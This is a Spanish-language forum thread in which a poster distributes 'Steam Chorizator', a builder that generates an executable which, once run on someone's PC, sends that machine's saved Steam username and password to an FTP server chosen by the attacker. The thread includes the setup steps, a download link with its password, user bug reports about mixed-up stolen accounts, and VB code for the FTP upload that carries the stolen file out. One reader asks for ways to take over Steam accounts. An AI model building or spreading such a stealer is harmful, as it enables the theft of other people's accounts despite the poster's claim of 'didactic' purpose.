Buenas aqui os dejo mi steam chorzator Versión Beta para que lo puedan descargar y probar.
su funcionamiento es muy simple, en el programa se le indica una dirección de ftp, usuario del ftp y contraseña del ftp y crea un "hijo" que lo que hace cuando se ejecuta es enviar al ftp que le hemos indicado un fichero txt con los datos de la cuenta de steam que tenga el pc donde se ejecuto.

Al ejecutarlo sale la siguiente pantalla, donde le indicaremos los datos del FTP:

Imagen

Pulsamos "Crear chorizator" y nos pide donde queremos guaradar al "hijo".

Imagen

Le ponemos un nombre y lo guardamos.

Imagen

Se nos indica que se ha creado correctamente.

Imagen

Podemos cerrar la aplicación.

Imagen

Y ya tenemos creado nuestro pequeño "bicho" que hara su trabajo.

Imagen

Descarga: [Enlace externo eliminado para invitados]
Contraseña: steamchorizator

Si encuentran algún bug o error por favor comunicarmelo.
Imagen
Esta muy bién, pero encontre un bug, si tienes más de 1 cuenta, en mi caso la de mi hermano y yo, a veces se mezcla, ejemplo: cuenta: Hermano1 pass:hermano2 Cuenta: hermano2 pass: hermano1
No sé si es considerado como bug es solo para informarte.
Me gustaría ver el source en privado si quieres solo para aprender como crea el txt en ftp que está muy bien, gracias
saludos
Tronco por lo menos para la próxima da créditos o siquiera modifica el nombre de los modulos

Imagen

PD: Recuerda que por hacer el cliente no quiere decir que lo hallas hecho
Imagen
Tienes razon skyweb07 tenia que haber puesto los creditos, pensaba ponerlos en la primera versión estable. Para que les voy a cambiar los nombres a los modulos si ese es el nombre que le puso su autor, al Cesar lo que es del Cesar.
Te agradezco skyweb07 por haber hecho el modulo de isteam en VB y aparecerá en los creditos.

Gracias listillo_186 por probarlo y reportar lo que has encontrado me lo mirare y lo solucionare, en cuanto a lo de enviar por ftp si te interesa como lo hace te lo paso el codigo.
Imagen
argo$ escribió:Tienes razon skyweb07 tenia que haber puesto los creditos, pensaba ponerlos en la primera versión estable. Para que les voy a cambiar los nombres a los modulos si ese es el nombre que le puso su autor, al Cesar lo que es del Cesar.
Te agradezco skyweb07 por haber hecho el modulo de isteam en VB y aparecerá en los creditos.

Gracias listillo_186 por probarlo y reportar lo que has encontrado me lo mirare y lo solucionare, en cuanto a lo de enviar por ftp si te interesa como lo hace te lo paso el codigo.
No hay problemas es que solo no quiero que epiezes como lo hice yo y vallas por el mal camino ;)
Imagen
No hay problemas es que solo no quiero que epiezes como lo hice yo y vallas por el mal camino ;) [/quote]

jajajaja, intentare ir por el buen camino....
Imagen
argo$ escribió:Tienes razon skyweb07 tenia que haber puesto los creditos, pensaba ponerlos en la primera versión estable. Para que les voy a cambiar los nombres a los modulos si ese es el nombre que le puso su autor, al Cesar lo que es del Cesar.

El código es vb6 ? es que ahora estoy utilizando Visual studio 2008 y no se si puedo modificarlo o usarlo si quiera te dejo mi correo ;) listillo_1(arroba)hotmail.com . Qué pasó? que camino malo elegistes? xD
Te contesto por aqui asi se a alguien tambien le interesa aqui lo tiene, enviar por ftp un archivo en vb 2008 es muy facil.

Imports System.Net

Si el servidor no esta protegido por contraseña:

my.Computer.Netw ork.UploadFile (ruta del archivo a subir,servidor ftp)

Ejemplo:

my.Computer.Netw ork.UploadFile ("C:\archivoParaSubir", "ftp://ejemplo.com")

Si el servidor esta protegido por contraseña:

My.Computer.Netw ork.UploadFile (ruta del archivo a subir, servidor ftp, usuario, contraseña)

Ejemplo:

My.Computer.Netw ork.UploadFile ("C:\archivoParaSubir", "ftp://ejemplo.com", "usuario1", "contraseña")

Saludos,

My.Computer.Netw ork.UploadFile ("C:\archivoParaSubir", "ftp://ejemplo.com", "usuario1", "contraseña")

Puedes crearte una clase con todas las opciones que hagas por red y asi tendras un mejor encapsulamiento del codigo.

Saludos,
Imagen
felipeh2 escribió:ahi veces que en el pass pone Text1 o no pone nada :S
Eso pasa por que el usuario pone la contraseña, solo se puede sacar si esta marcada la opcion recordar contraseña, gracias por probarlo.
Imagen
Curiosa herramienta, pero de que sirve?
hoy en dia es imposible apropiarse de una cuenta steam basta con que el antiguo propietario de dicha cuenta facilite x informacion al servicio tecnico de steam

ultimos digitos de la tarjeta de credito con la que compro uno de los juegos de su lista
una foto de la caja con la key de uno de los juegos y automaticamente el servicio tecnico de steam le facilita datos nuevos al correo que el antiguo propietario quiera

asique como no juegues cuando el propietario no este online poca cosa podemos hacer

si hay algun metodo de apropiarse de una steam comentarlo por que tengo por hay un par de ellas interesantes

saludos!! y gracias por el aporte
oww escribió:Curiosa herramienta, pero de que sirve?
hoy en dia es imposible apropiarse de una cuenta steam basta con que el antiguo propietario de dicha cuenta facilite x informacion al servicio tecnico de steam

ultimos digitos de la tarjeta de credito con la que compro uno de los juegos de su lista
una foto de la caja con la key de uno de los juegos y automaticamente el servicio tecnico de steam le facilita datos nuevos al correo que el antiguo propietario quiera

asique como no juegues cuando el propietario no este online poca cosa podemos hacer

si hay algun metodo de apropiarse de una steam comentarlo por que tengo por hay un par de ellas interesantes

saludos!! y gracias por el aporte
Buenas,

El programa sirve para mandar a un ftp los datos del steam, usuario y contraseña, esta hecho con fines didacticos, y no va más alla.

Saludos,
Imagen
Responder

Volver a “Nuestros Programas”